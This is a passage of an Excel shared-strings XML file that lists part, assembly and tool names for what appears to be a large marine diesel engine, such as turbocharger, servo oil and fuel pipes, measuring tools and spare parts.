    <t>SELF-ADHESIVE LABEL SET</t>
  </si>
  <si>
    <t>CONTROL BOX</t>
  </si>
  <si>
    <t>ADJUSTABLE ROD</t>
  </si>
  <si>
    <t>FORK END ROD</t>
  </si>
  <si>
    <t>SCAVENGE AIR RECEIVER MACHINING</t>
  </si>
  <si>
    <t>SCAVENGE AIR RECEIVER</t>
  </si>
  <si>
    <t>BACK WALL</t>
  </si>
  <si>
    <t>CHARGING UNIT</t>
  </si>
  <si>
    <t>TURBOCHARGER SUPPORT</t>
  </si>
  <si>
    <t>CONE</t>
  </si>
  <si>
    <t>ACCESS</t>
  </si>
  <si>
    <t>SURFACE PROTECTION INSTRUCTIONS</t>
  </si>
  <si>
    <t>SCAVENGE AIR RECEIVER ASSY PARTS</t>
  </si>
  <si>
    <t>SOUND INSULATION</t>
  </si>
  <si>
    <t>LUG</t>
  </si>
  <si>
    <t>FLAP</t>
  </si>
  <si>
    <t>GUIDE</t>
  </si>
  <si>
    <t>SIGHT GLASS</t>
  </si>
  <si>
    <t>TURBOCHARGER</t>
  </si>
  <si>
    <t>SCHEMATIC LAYOUT</t>
  </si>
  <si>
    <t>TURBOCHARGING ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>EXPANSION PIECE</t>
  </si>
  <si>
    <t>AUXILIARY BLOWER</t>
  </si>
  <si>
    <t>AIR DUCT</t>
  </si>
  <si>
    <t>AUXILIARY BLOWER SWITCH BOX</t>
  </si>
  <si>
    <t>LABEL</t>
  </si>
  <si>
    <t>ELECTRIC CIRCUIT DIAGRAM</t>
  </si>
  <si>
    <t>PART LIST</t>
  </si>
  <si>
    <t>SCAVENGE AIR COOLER</t>
  </si>
  <si>
    <t>WATER SEPARATOR SCAVENGE AIR</t>
  </si>
  <si>
    <t>WATER SEPARATOR</t>
  </si>
  <si>
    <t>GUIDE BAR</t>
  </si>
  <si>
    <t>ROUND RUBBER CORD</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATION OVERVIEW</t>
  </si>
  <si>
    <t>PULSE LUBRICATION PUMP</t>
  </si>
  <si>
    <t>LUBRICATING PUMP</t>
  </si>
  <si>
    <t>PULSE LUBRICATING SYSTEM PARAM.</t>
  </si>
  <si>
    <t>PLATFORM OUTLINE VIEW</t>
  </si>
  <si>
    <t>UPPER MAIN PLATFORM FUEL SIDE</t>
  </si>
  <si>
    <t>I-BEAM</t>
  </si>
  <si>
    <t>PLATFORM ELEMENT</t>
  </si>
  <si>
    <t>EYELET</t>
  </si>
  <si>
    <t>LOWER MAIN PLATFORM EXHAUST SIDE</t>
  </si>
  <si>
    <t>RAILING</t>
  </si>
  <si>
    <t>LOCK STUFFING</t>
  </si>
  <si>
    <t>FOOT PLATE</t>
  </si>
  <si>
    <t>WALK AREA</t>
  </si>
  <si>
    <t>PLATE CONTOUR</t>
  </si>
  <si>
    <t>DIAGRAM WASHING PLANT/DRAIN</t>
  </si>
  <si>
    <t>DIAGRAM CYLINDER LUBRICATING OIL</t>
  </si>
  <si>
    <t>DIAGRAM OIL</t>
  </si>
  <si>
    <t>DIAGRAM COOLING WATER</t>
  </si>
  <si>
    <t>DIAGRAM AIR</t>
  </si>
  <si>
    <t>DIAGRAM FUEL OIL</t>
  </si>
  <si>
    <t>EXHAUST MANIFOLD ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>WIRE MESH</t>
  </si>
  <si>
    <t>SOUND AND HEAT INSULATION</t>
  </si>
  <si>
    <t>EXHAUST MANIFOLD</t>
  </si>
  <si>
    <t>STIFFENING RIB</t>
  </si>
  <si>
    <t>CONNECTION TUBE</t>
  </si>
  <si>
    <t>ACTUATOR</t>
  </si>
  <si>
    <t>COUPLING</t>
  </si>
  <si>
    <t>INDICATOR</t>
  </si>
  <si>
    <t>REDUCTION UNION PIECE</t>
  </si>
  <si>
    <t>CONTROL AIR PIPE</t>
  </si>
  <si>
    <t>EXPANSION PIECE EXHAUST VALVE</t>
  </si>
  <si>
    <t>INLET PIPE</t>
  </si>
  <si>
    <t>FLANGE SQUARE</t>
  </si>
  <si>
    <t>BUTTERFLY VALVE</t>
  </si>
  <si>
    <t>OUTLET PIPE</t>
  </si>
  <si>
    <t>STRAUB-GRIP-L</t>
  </si>
  <si>
    <t>VENTING/DRAIN PIPE SAC</t>
  </si>
  <si>
    <t>DRAIN PIPE</t>
  </si>
  <si>
    <t>FUNNEL</t>
  </si>
  <si>
    <t>VENTING PIPE</t>
  </si>
  <si>
    <t>SAC PIPE COOLING WATER</t>
  </si>
  <si>
    <t>COOLING WATER INLET</t>
  </si>
  <si>
    <t>COOLING WATER OUTLET</t>
  </si>
  <si>
    <t>WATER/AIR PIPE CLEANING PLANT</t>
  </si>
  <si>
    <t>AIR PIPE</t>
  </si>
  <si>
    <t>WATER PIPE</t>
  </si>
  <si>
    <t>WASHING PLANT SAC</t>
  </si>
  <si>
    <t>DISTRIBUTOR PIPE</t>
  </si>
  <si>
    <t>FILLING FUNNEL</t>
  </si>
  <si>
    <t>HOOK</t>
  </si>
  <si>
    <t>STAINLESS STEEL BALL VALVE</t>
  </si>
  <si>
    <t>SHUT-OFF VALVE</t>
  </si>
  <si>
    <t>NEEDLE VALVE</t>
  </si>
  <si>
    <t>MOUNTING CLAMP</t>
  </si>
  <si>
    <t>NIPPLE</t>
  </si>
  <si>
    <t>COLLEC. MAIN OILY WATER RECEIVER</t>
  </si>
  <si>
    <t>CHECKING PIPE SHUT-OFF VALVE</t>
  </si>
  <si>
    <t>CONDENSATE DRAIN PIPE</t>
  </si>
  <si>
    <t>END FLANGE</t>
  </si>
  <si>
    <t>BOTTLE</t>
  </si>
  <si>
    <t>PERFORATED SHEET</t>
  </si>
  <si>
    <t>OIL PIPE MAIN BEARING</t>
  </si>
  <si>
    <t>SPECIAL FLANGE</t>
  </si>
  <si>
    <t>SERVO OIL SERVICE PUMP</t>
  </si>
  <si>
    <t>SOCKET</t>
  </si>
  <si>
    <t>PUMP SUPPORT</t>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE SERVO OIL</t>
  </si>
  <si>
    <t>ORDER SPECIFICATION</t>
  </si>
  <si>
    <t>OIL INLET/DRAIN PIPE SERVO SYS.</t>
  </si>
  <si>
    <t>SERVO OIL LEAKAGE PIPE SUP. UNIT</t>
  </si>
  <si>
    <t>OIL LEAKAGE MONITORING</t>
  </si>
  <si>
    <t>OIL PIPE DRAIN SUPPLY UNIT</t>
  </si>
  <si>
    <t>OIL PIPE DRAIN</t>
  </si>
  <si>
    <t>HYDRAULIC PIPE EXHAUST VALVE</t>
  </si>
  <si>
    <t>HYDRAULIC PIPE</t>
  </si>
  <si>
    <t>COLLEC MAIN LEAKAGE OIL BEDPLATE</t>
  </si>
  <si>
    <t>SERVO OIL PIPE CYL. LUBRICATION</t>
  </si>
  <si>
    <t>OIL PIPE</t>
  </si>
  <si>
    <t>RETURN PIPE CYL. LUBRICATION</t>
  </si>
  <si>
    <t>CYL. LUBRICATING OIL PIPE CYL.</t>
  </si>
  <si>
    <t>FILTER SYSTEM</t>
  </si>
  <si>
    <t>MEASUREMENT TUBE</t>
  </si>
  <si>
    <t>AIR VENT</t>
  </si>
  <si>
    <t>DUPLEX FILTER</t>
  </si>
  <si>
    <t>INTERMEDIATE PIPE</t>
  </si>
  <si>
    <t>ANGLE THERMOMETER</t>
  </si>
  <si>
    <t>LEAK OIL PIPE</t>
  </si>
  <si>
    <t>INSULATION INSTRUCTIONS</t>
  </si>
  <si>
    <t>COLL MAIN DIRTY OIL PIST U.SIDE</t>
  </si>
  <si>
    <t>COLLECTOR PIPE</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE</t>
  </si>
  <si>
    <t>STARTING AIR PIPE</t>
  </si>
  <si>
    <t>MAIN AIR PIPE</t>
  </si>
  <si>
    <t>AIR PIPING</t>
  </si>
  <si>
    <t>VALVE HOLDER</t>
  </si>
  <si>
    <t>FLAME ARRESTER</t>
  </si>
  <si>
    <t>AIR SPRING PIPE EXHAUST VALVE</t>
  </si>
  <si>
    <t>OIL LEAKAGE RETURN</t>
  </si>
  <si>
    <t>OIL DRAIN COLLECTING VESSEL</t>
  </si>
  <si>
    <t>INDICATOR FLOW CHECK</t>
  </si>
  <si>
    <t>DISHED AND FLANGED HEAD</t>
  </si>
  <si>
    <t>FEMALE CONNECTOR</t>
  </si>
  <si>
    <t>FLOAT CONTROL COMPLETE</t>
  </si>
  <si>
    <t>VENTING PIPE CRANKCASE</t>
  </si>
  <si>
    <t>VENTING PIPE TC OUTLET</t>
  </si>
  <si>
    <t>VENTING PIPE CYL. COOLING WATER</t>
  </si>
  <si>
    <t>CONTROL AIR SUPPLY INLET</t>
  </si>
  <si>
    <t>RELIEF VALVE STARTING AIR</t>
  </si>
  <si>
    <t>VALVE DISC</t>
  </si>
  <si>
    <t>FUEL PIPE INJECTION PUMP INLET</t>
  </si>
  <si>
    <t>FUEL INLET PIPE</t>
  </si>
  <si>
    <t>FUEL PIPE RETURN</t>
  </si>
  <si>
    <t>FUEL OUTLET PIPE</t>
  </si>
  <si>
    <t>PRESSURE RELIEF VALVE</t>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE INJ. VALVE</t>
  </si>
  <si>
    <t>FUEL PRESSURE PIPE</t>
  </si>
  <si>
    <t>FUEL LEAKAGE PIPE</t>
  </si>
  <si>
    <t>FUEL LEAKAGE MONITORING</t>
  </si>
  <si>
    <t>MATERIAL-SPECIFICATION</t>
  </si>
  <si>
    <t>FUEL LEAKAGE PIPE INJ. VALVE</t>
  </si>
  <si>
    <t>SQUARE HOLLOW PROFILE</t>
  </si>
  <si>
    <t>STRAP</t>
  </si>
  <si>
    <t>STEEL RING</t>
  </si>
  <si>
    <t>SLIP RING</t>
  </si>
  <si>
    <t>ANGLE BAR</t>
  </si>
  <si>
    <t>HEATING PIPE FUEL INLET/OUTLET</t>
  </si>
  <si>
    <t>HOSE CLIP</t>
  </si>
  <si>
    <t>FIRE EXTINGUISHING PIPE</t>
  </si>
  <si>
    <t>THERMOMETER</t>
  </si>
  <si>
    <t>THERMOMETER POCKET</t>
  </si>
  <si>
    <t>U-TUBE GAUGE</t>
  </si>
  <si>
    <t>ARRANGEMENT REMOTE THERMOMETER</t>
  </si>
  <si>
    <t>PRESSURE GAUGE PIPING</t>
  </si>
  <si>
    <t>BLANK NAME PLATE</t>
  </si>
  <si>
    <t>INSTRUMENT PANEL</t>
  </si>
  <si>
    <t>PANEL</t>
  </si>
  <si>
    <t>NUT</t>
  </si>
  <si>
    <t>ANTI-VIBRATION MOUNTING</t>
  </si>
  <si>
    <t>THROTTLE PIECE</t>
  </si>
  <si>
    <t>INSTRUMENT PANEL ARRANGEMENT</t>
  </si>
  <si>
    <t>CRANK ANGLE SENSOR UNIT</t>
  </si>
  <si>
    <t>CONTROL UNIT</t>
  </si>
  <si>
    <t>AXIAL DETUNER MONITORING</t>
  </si>
  <si>
    <t>TURBOCHARGER MONITORING</t>
  </si>
  <si>
    <t>DISTANCE BUSH</t>
  </si>
  <si>
    <t>TEMPERATURE SENSOR</t>
  </si>
  <si>
    <t>REMOTE THERMOMETER</t>
  </si>
  <si>
    <t>CABLE</t>
  </si>
  <si>
    <t>PRESSURE SWITCH/TRANSMITTER</t>
  </si>
  <si>
    <t>2 CONDUCTOR TERMINAL BLOCK</t>
  </si>
  <si>
    <t>COMBUSTION CONTROL/MONITORING</t>
  </si>
  <si>
    <t>CONVERTER</t>
  </si>
  <si>
    <t>CONTROL CABLE</t>
  </si>
  <si>
    <t>PROTECTION TUBE</t>
  </si>
  <si>
    <t>PISTON COOLING TEMP. MONITORING</t>
  </si>
  <si>
    <t>OIL TROUGH</t>
  </si>
  <si>
    <t>PARTITION WALL</t>
  </si>
  <si>
    <t>CHANNEL PLATE</t>
  </si>
  <si>
    <t>SENSOR</t>
  </si>
  <si>
    <t>CONTROL PANEL</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>TERMINAL BOX E10</t>
  </si>
  <si>
    <t>JACKET PLATE</t>
  </si>
  <si>
    <t>TERMINAL BOXES ALARM</t>
  </si>
  <si>
    <t>ALARM SENSORS</t>
  </si>
  <si>
    <t>AMPLIFIER</t>
  </si>
  <si>
    <t>LEVEL SWITCH</t>
  </si>
  <si>
    <t>SOLENOID FLOAT SWITCH</t>
  </si>
  <si>
    <t>FLOW SENSOR</t>
  </si>
  <si>
    <t>SCREW-IN NIPPLE</t>
  </si>
  <si>
    <t>WIRING RAIL UNIT</t>
  </si>
  <si>
    <t>TERMINAL</t>
  </si>
  <si>
    <t>CABLE PROTECTION TUBE</t>
  </si>
  <si>
    <t>CABLE BUSHING</t>
  </si>
  <si>
    <t>CABLE CLIP</t>
  </si>
  <si>
    <t>FLEX ELECTRONIC COMPONENTS</t>
  </si>
  <si>
    <t>TERMINAL BOX/ CABLE AND PLUG</t>
  </si>
  <si>
    <t>CONNECTOR</t>
  </si>
  <si>
    <t>CORD</t>
  </si>
  <si>
    <t>METALLIC HOSE END</t>
  </si>
  <si>
    <t>RING PIECE</t>
  </si>
  <si>
    <t>PROTECTION HOSE</t>
  </si>
  <si>
    <t>EARTH TERMINAL</t>
  </si>
  <si>
    <t>POWER SUPPLY</t>
  </si>
  <si>
    <t>CIRCUIT BREAKER</t>
  </si>
  <si>
    <t>SEMICONDUCTOR</t>
  </si>
  <si>
    <t>CONTROL DIAGRAM</t>
  </si>
  <si>
    <t>REPORT</t>
  </si>
  <si>
    <t>PULSE ELECTRONIC COMPONENTS</t>
  </si>
  <si>
    <t>RESISTOR</t>
  </si>
  <si>
    <t>TOOL INSTRUCTIONS</t>
  </si>
  <si>
    <t>REMOV./ FITTING OF BEARING COVER</t>
  </si>
  <si>
    <t>REMOVAL OF BEARING SHELL</t>
  </si>
  <si>
    <t>REMOVAL OF CONNECTING ROD</t>
  </si>
  <si>
    <t>REMOVAL &amp; FITTING OF CROSSHEAD</t>
  </si>
  <si>
    <t>UPPER CONNECTING ROD BEARING</t>
  </si>
  <si>
    <t>REMOVAL OF BEARING COVER</t>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING/COMPRES.SHIMS</t>
  </si>
  <si>
    <t>TOOL CAMSHAFT ASSEMBLY</t>
  </si>
  <si>
    <t>ASSEMBLY OF GLAND BOX</t>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING/ PISTON</t>
  </si>
  <si>
    <t>OPERATION WITH DEFEC. TC</t>
  </si>
  <si>
    <t>MEASURES</t>
  </si>
  <si>
    <t>INSPECTION AND DISMANTLING</t>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING/AXIAL DETUNER</t>
  </si>
  <si>
    <t>ASSY AND DISMANTLING/ AIR COOLER</t>
  </si>
  <si>
    <t>TOOL GENERAL COMBINATION WRENCH</t>
  </si>
  <si>
    <t>TOOL GENERAL OPEN END WRENCH</t>
  </si>
  <si>
    <t>TOOL GENERAL RING SLUGGING WRENCH</t>
  </si>
  <si>
    <t>SLUGGING WRENCH/ RING</t>
  </si>
  <si>
    <t>TOOL GENERAL ALLEN KEY</t>
  </si>
  <si>
    <t>TOOL GENERAL SPANNERS</t>
  </si>
  <si>
    <t>SPANNER</t>
  </si>
  <si>
    <t>TOOL GENERAL RODS</t>
  </si>
  <si>
    <t>TOOL GENERAL WRENCHES</t>
  </si>
  <si>
    <t>TOOL GENERAL PLIERS</t>
  </si>
  <si>
    <t>TOOL GENERAL WITHDRAWING GEAR</t>
  </si>
  <si>
    <t>WITHDRAWING GEAR</t>
  </si>
  <si>
    <t>COLLAR NUT</t>
  </si>
  <si>
    <t>TOOL GENERAL JACKS/PUMPS</t>
  </si>
  <si>
    <t>HYDRAULIC RAMS AND PUMPS</t>
  </si>
  <si>
    <t>HYDRAULIC UNIT</t>
  </si>
  <si>
    <t>SPECIAL NIPPLE</t>
  </si>
  <si>
    <t>COUPLING SOCKET</t>
  </si>
  <si>
    <t>HIGH-PRESSURE PISTON PUMP</t>
  </si>
  <si>
    <t>HYDRAULIC RAM</t>
  </si>
  <si>
    <t>ADAPTER</t>
  </si>
  <si>
    <t>CLOSING VALVE</t>
  </si>
  <si>
    <t>HOSE</t>
  </si>
  <si>
    <t>ADAPTER PIECE</t>
  </si>
  <si>
    <t>DISTRIBUTING PIECE</t>
  </si>
  <si>
    <t>HYDR. DISTRIBUTOR</t>
  </si>
  <si>
    <t>COUPLING ELEMENT</t>
  </si>
  <si>
    <t>TOOL GENERAL GREASE GUN</t>
  </si>
  <si>
    <t>HIGH-PRESSURE GREASE GUN</t>
  </si>
  <si>
    <t>TOOL GENERAL TORQUE WRENCHES</t>
  </si>
  <si>
    <t>TORQUE SPANNER</t>
  </si>
  <si>
    <t>POWER AMPLIFIER</t>
  </si>
  <si>
    <t>SOCKET WRENCH INSERT</t>
  </si>
  <si>
    <t>HEX HEAD DRIVERS</t>
  </si>
  <si>
    <t>SOCKET WRENCH SET</t>
  </si>
  <si>
    <t>EXTENSION</t>
  </si>
  <si>
    <t>TOOL GENERAL PRES. MEASUREMENT</t>
  </si>
  <si>
    <t>TOOL FOR PRESSURE MEASUREMENT</t>
  </si>
  <si>
    <t>CASE</t>
  </si>
  <si>
    <t>PRESSURE PUMP</t>
  </si>
  <si>
    <t>HIGH PRESSURE HOSE</t>
  </si>
  <si>
    <t>ADJUSTING TOOL</t>
  </si>
  <si>
    <t>MEASURING CONNECTION</t>
  </si>
  <si>
    <t>TOOL GENERAL CHAIN BLOCK</t>
  </si>
  <si>
    <t>LIFTING TOOL</t>
  </si>
  <si>
    <t>BRACKET</t>
  </si>
  <si>
    <t>SHACKLE</t>
  </si>
  <si>
    <t>TOOL OPEN END TORQUE WRENCH</t>
  </si>
  <si>
    <t>TOOL SPECIAL LIFTING POINTS</t>
  </si>
  <si>
    <t>EYE BOLT</t>
  </si>
  <si>
    <t>LIFTING RING</t>
  </si>
  <si>
    <t>SWIVEL LUG</t>
  </si>
  <si>
    <t>TOOL GENERAL STUD DRIVER</t>
  </si>
  <si>
    <t>DISMANTLING TOOL</t>
  </si>
  <si>
    <t>SPECIAL SCREW</t>
  </si>
  <si>
    <t>SPECIAL NUT</t>
  </si>
  <si>
    <t>TOOL MAIN BEARING ASSEMBLY</t>
  </si>
  <si>
    <t>DEVICE</t>
  </si>
  <si>
    <t>WIRE ROPE SLING</t>
  </si>
  <si>
    <t>HEXAGON SOCKET HEAD SCREW</t>
  </si>
  <si>
    <t>TRANSPORTATION TOOL</t>
  </si>
  <si>
    <t>ASSEMBLING AND DISMANTLING</t>
  </si>
  <si>
    <t>DOUBLE SPRING CLIP</t>
  </si>
  <si>
    <t>TOOL MAIN BEARING MEASURING</t>
  </si>
  <si>
    <t>FEELER GAUGE</t>
  </si>
  <si>
    <t>DEPTH GAUGE WITH CASE</t>
  </si>
  <si>
    <t>FEELER GAUGE WITH CASE</t>
  </si>
  <si>
    <t>BEARING FEELER GAUGE</t>
  </si>
  <si>
    <t>TOOL MAIN BEARING PRE-TENSIONING</t>
  </si>
  <si>
    <t>DOUBLE PRE-TENSIONER</t>
  </si>
  <si>
    <t>DOUBLE CYLINDER</t>
  </si>
  <si>
    <t>AIR VENT SCREW</t>
  </si>
  <si>
    <t>METAL BOX</t>
  </si>
  <si>
    <t>THRUST DEVICE</t>
  </si>
  <si>
    <t>GIRDER</t>
  </si>
  <si>
    <t>TOOL MAIN BEARING SHELL ASSEMBLY</t>
  </si>
  <si>
    <t>DOUBLE I-BROAD FLANGED BEAM</t>
  </si>
  <si>
    <t>TOOL FOUNDATION PRE-TENSIONING</t>
  </si>
  <si>
    <t>PRE-TENSIONER</t>
  </si>
  <si>
    <t>TOOL THRUST BEARING ASSEMBLY</t>
  </si>
  <si>
    <t>TURNING-OUT DEVICE</t>
  </si>
  <si>
    <t>CARRIER</t>
  </si>
  <si>
    <t>TOOL COLUMN WORKING SUPPORT</t>
  </si>
  <si>
    <t>WORKING SURFACES ON COLUMN</t>
  </si>
  <si>
    <t>FIXING ANGLE</t>
  </si>
  <si>
    <t>MOUNTING PANEL</t>
  </si>
  <si>
    <t>TOOL TIE ROD PRE-TENSIONING</t>
  </si>
  <si>
    <t>TOOL CYLINDER LINER ASSEMBLY</t>
  </si>
  <si>
    <t>THREADED BLOCK</t>
  </si>
  <si>
    <t>LIFTING BOSS</t>
  </si>
  <si>
    <t>FIXING BLOCK</t>
  </si>
  <si>
    <t>TOOL CYLINDER LINER MEASURING</t>
  </si>
  <si>
    <t>INSIDE MICROMETER</t>
  </si>
  <si>
    <t>MEASURING DEVICE</t>
  </si>
  <si>
    <t>TOOL GLAND BOX ASSEMBLY</t>
  </si>
  <si>
    <t>DISTANCE</t>
  </si>
  <si>
    <t>CLAMPING RING 2-PARTS</t>
  </si>
  <si>
    <t>TOOL CYL. COVER/EXH. VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>ASSEMBLY AND TRANSPORT DEVICE</t>
  </si>
  <si>
    <t>TOOL INJECTION VALVE GRINDING</t>
  </si>
  <si>
    <t>OVERHAUL DEVICE</t>
  </si>
  <si>
    <t>CUTTER HOLDER</t>
  </si>
  <si>
    <t>PROFILE CUTTER</t>
  </si>
  <si>
    <t>TOOL INJECTOR TEST BENCH</t>
  </si>
  <si>
    <t>TOOL CYLINDER COVER PRE-TENSIONING</t>
  </si>
  <si>
    <t>TOOL BOX</t>
  </si>
  <si>
    <t>BLIND RIVET</t>
  </si>
  <si>
    <t>TOOL VALVE CAGE PRE-TENSIONING</t>
  </si>
  <si>
    <t>TOOL VALVE SEAT ASSEMBLY</t>
  </si>
  <si>
    <t>ASSEMBLING AND DISMANTLING DEVICE</t>
  </si>
  <si>
    <t>UPPER RING 2-PARTS</t>
  </si>
  <si>
    <t>RING HALF</t>
  </si>
  <si>
    <t>LOWER RING 2-PARTS</t>
  </si>
  <si>
    <t>VALVE PROTECTION</t>
  </si>
  <si>
    <t>PRESSURE ELEMENT</t>
  </si>
  <si>
    <t>TOOL VALVE SEAT MACHINING</t>
  </si>
  <si>
    <t>EXHAUST VALVE ROTATION DEVICE</t>
  </si>
  <si>
    <t>TOOL VALVE SPINDLE GRINDING</t>
  </si>
  <si>
    <t>PLASTIC FOIL</t>
  </si>
  <si>
    <t>VALVE GRINDER</t>
  </si>
  <si>
    <t>TOOL INJECTION VALVE PROTECTION</t>
  </si>
  <si>
    <t>PROTECTION HOOD</t>
  </si>
  <si>
    <t>TOOL INJECTION VALVE ADJUSTMENT</t>
  </si>
  <si>
    <t>TOOL INJECTION NOZZLE ASSEMBLY</t>
  </si>
  <si>
    <t>MOUNTING CYLINDER</t>
  </si>
  <si>
    <t>DISASSEMBLING TOOL</t>
  </si>
  <si>
    <t>SUPPORTING PLATE</t>
  </si>
  <si>
    <t>TOOL CRANKSHAFT MEASURING</t>
  </si>
  <si>
    <t>CRANKSHAFT CHECKING EQUIPMENT</t>
  </si>
  <si>
    <t>TOOL CONNEC. ROD PRE-TENSIONING</t>
  </si>
  <si>
    <t>TOOL CON. ROD/CROSSHEAD ASSEMBLY</t>
  </si>
  <si>
    <t>WIRE ROPE SLING WITH SHACKLE</t>
  </si>
  <si>
    <t>CENTRING PIECE</t>
  </si>
  <si>
    <t>TOOL CONNECTING ROD ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL PISTON ROD/CROSSHEAD PRE-TENS.</t>
  </si>
  <si>
    <t>TOOL CONNEC. ROD BEAR. INSPECT.</t>
  </si>
  <si>
    <t>STOP PLATE</t>
  </si>
  <si>
    <t>TOOL CONNEC. ROD BEARING ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL PISTON ASSEMBLY</t>
  </si>
  <si>
    <t>PISTON HOLDER</t>
  </si>
  <si>
    <t>HALF SHELL</t>
  </si>
  <si>
    <t>STIFFENING PLATE</t>
  </si>
  <si>
    <t>WEB</t>
  </si>
  <si>
    <t>WELDING HINGE</t>
  </si>
  <si>
    <t>DISMANTLING AND ASSEMBLING</t>
  </si>
  <si>
    <t>INSERTING CONE</t>
  </si>
  <si>
    <t>FITTING AND DISMANTLING DEVICE</t>
  </si>
  <si>
    <t>LIFTING GEAR TOP PART</t>
  </si>
  <si>
    <t>WIRE ROPE</t>
  </si>
  <si>
    <t>TOOL PISTON HEAD PRE-TENSIONING</t>
  </si>
  <si>
    <t>TOOL PISTON MEASURING</t>
  </si>
  <si>
    <t>REFERENCE PLATE</t>
  </si>
  <si>
    <t>JACKING SCREW</t>
  </si>
  <si>
    <t>TAB</t>
  </si>
  <si>
    <t>TOOL PISTON RING ASSEMBLY</t>
  </si>
  <si>
    <t>PISTON RING TENSIONING DEVICE</t>
  </si>
  <si>
    <t>JAW</t>
  </si>
  <si>
    <t>T-STEEL</t>
  </si>
  <si>
    <t>THREADED ROD</t>
  </si>
  <si>
    <t>EXTENDED SPINDLE</t>
  </si>
  <si>
    <t>TOOL INTERMEDIATE WHEEL ASSEMBLY</t>
  </si>
  <si>
    <t>LOCATING PIN</t>
  </si>
  <si>
    <t>TOOL SUPPLY UNIT ASSEMBLY</t>
  </si>
  <si>
    <t>WELDING PIECE</t>
  </si>
  <si>
    <t>ROLLER LIFTING TOOL</t>
  </si>
  <si>
    <t>LIMITER</t>
  </si>
  <si>
    <t>ARRANGEMENT OF COVERS</t>
  </si>
  <si>
    <t>TOOL FUEL PUMP ASSEMBLY</t>
  </si>
  <si>
    <t>FIXING SCREW</t>
  </si>
  <si>
    <t>ADJUSTING DEVICE</t>
  </si>
  <si>
    <t>TOOL RAIL UNIT MAINTENANCE</t>
  </si>
  <si>
    <t>SURFACE PLATE</t>
  </si>
  <si>
    <t>CAPPING END</t>
  </si>
  <si>
    <t>TOOL SUPPLY UNIT TRANSPORT</t>
  </si>
  <si>
    <t>TOOL AUXILIARY BLOWER ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL SAC ASSEMBLY</t>
  </si>
  <si>
    <t>SQUARE PIPE</t>
  </si>
  <si>
    <t>FIXING FLANGE</t>
  </si>
  <si>
    <t>CONNECTING ELEMENT</t>
  </si>
  <si>
    <t>TOOL WATER SEPARATOR ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL PULSE ACCUMULATOR CHARGING</t>
  </si>
  <si>
    <t>TOOL HYDRAULIC PIPING MACHINING</t>
  </si>
  <si>
    <t>GRINDING TOOL</t>
  </si>
  <si>
    <t>TOOL AIR PIPES FAILURE</t>
  </si>
  <si>
    <t>TOOL HIGH PRESSURE PIPE GRINDING</t>
  </si>
  <si>
    <t>GRINDING DEVICE</t>
  </si>
  <si>
    <t>STENCIL</t>
  </si>
  <si>
    <t>SW-DOWNLOAD PACKAGE</t>
  </si>
  <si>
    <t>SOFTWARE TOOLS</t>
  </si>
  <si>
    <t>PLUG-IN CONNECTION</t>
  </si>
  <si>
    <t>LIST OF SPARE PARTS</t>
  </si>
  <si>
    <t>SPARE PARTS AUX.BLOW. SWITCH BOX</t>
  </si>
  <si>
    <t>RELAY</t>
  </si>
  <si>
    <t>COIL</t>
  </si>
  <si>
    <t>TIME LAG RELAY</t>
  </si>
  <si>
    <t>LIGHT BULB</t>
  </si>
  <si>
    <t>RECTIFIER</t>
  </si>
  <si>
    <t>SPARE PART BOX</t>
  </si>
  <si>
    <t>SPARE PARTS CYLINDER LUBRICATION</t>
  </si>
  <si>
    <t>SPARE PARTS FLEX SYSTEM</t>
  </si>
  <si>
    <t>SPARE PARTS</t>
  </si>
  <si>
    <t>SELF-ADHESIVE LABEL</t>
  </si>
  <si>
    <t>SPARE PARTS AUTOMATIC OIL FILTER</t>
  </si>
  <si>
    <t>SET OF SEALS</t>
  </si>
  <si>
    <t>DIFFERENTIAL PRESSURE GAUGE</t>
  </si>
  <si>
    <t>5/2-WAY SOLENOID VALVE</t>
  </si>
  <si>
    <t>SPARES KIT</t>
  </si>
  <si>
    <t>SPARE PARTS DUPLEX FILTER</t>
  </si>
  <si>
    <t>ENGINE ALIGNMENT</t>
  </si>
  <si>
    <t>ENGINE SEATING/FOUNDATION</t>
  </si>
  <si>
    <t>EPOXY RESIN</t>
  </si>
  <si>
    <t>SPHERICAL ROUND NUT M48</t>
  </si>
  <si>
    <t>SEALING PIECE</t>
  </si>
  <si>
    <t>JOINT DISC</t>
  </si>
  <si>
    <t>ENGINE SIDE STOPPER</t>
  </si>
  <si>
    <t>TOOL ENGINE ALIGNMENT</t>
  </si>
  <si>
    <t>ENGINE COUPLING/FLYWHEEL CASING</t>
  </si>
  <si>
    <t>CASING</t>
  </si>
  <si>
    <t>ENGINE STAYS</t>
  </si>
  <si>
    <t>HYDRAULIC CYLINDER</t>
  </si>
  <si>
    <t>CONNECTING PIECE (SW41)</t>
  </si>
  <si>
    <t>POINTER</t>
  </si>
  <si>
    <t>BEARER</t>
  </si>
  <si>
    <t>TREADED SLEEVE</t>
  </si>
  <si>
    <t>BLADDER ACCUMULATOR</t>
  </si>
  <si>
    <t>HYDRAULIC LATERAL DEVICE</t>
  </si>
  <si>
    <t>TESTING AND FILLING DEVICE</t>
  </si>
  <si>
    <t>INSTRUCTION FOR PRESSURE TEST</t>
  </si>
  <si>
    <t>FEMALE UNION</t>
  </si>
  <si>
    <t>PREC. SEAMLESS PIPE</t>
  </si>
  <si>
    <t>COOLING WATER SYSTEMS</t>
  </si>
  <si>
    <t>CENTRAL COOLING WATER SYSTEM</t>
  </si>
  <si>
    <t>EXPANSION TANK</t>
  </si>
  <si>
    <t>CONCEPT GUIDANCE</t>
  </si>
  <si>
    <t>FUEL OIL SYSTEM</t>
  </si>
  <si>
    <t>MIXING UNIT</t>
  </si>
  <si>
    <t>INSTRUCTION FOR FLUSHING</t>
  </si>
  <si>
    <t>DISTILLATE FUELS</t>
  </si>
  <si>
    <t>LEAKAGE COLLECTION/WASHING SYS.</t>
  </si>
